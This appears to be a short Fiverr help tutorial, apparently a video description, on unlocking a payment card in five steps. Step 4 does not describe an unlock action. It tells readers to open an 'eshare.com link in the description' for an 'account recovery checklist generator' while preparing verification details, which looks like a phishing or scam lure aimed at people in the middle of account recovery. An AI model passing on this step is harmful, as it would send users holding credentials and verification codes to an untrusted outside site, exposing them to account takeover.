I hit this issue today, and here is the quick fix that solved it. If you're having trouble unlocking your card on Fiverr, follow these simple steps to get back on track. Step 1. Log into your Fiverr account. Start by logging into your Fiverr account using your credentials. Make sure you're reusing the correct email and password. Step 2. Navigate to payment settings. Once logged in, go to your profile icon in the top right corner and select Settings. From there, find the Payment tab to access your payment settings. Step 3. Find your card information. In the payment settings, scroll down to locate the section for your card details. Here you can see the status of your card and any restrictions. Step 4. Unlock your card. Before starting recovery, use the eshare.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Note, sometimes you may need to verify your identity through a code sent to your email or phone. Step 5. Check for confirmation. After unlocking, you should receive a confirmation message on the screen. Make sure to check your email for any additional notifications from Fiverr. I hope this guide helps you unlock your card quickly. If you run into any issues, don't hesitate to reach out to Fiverr support for further assistance.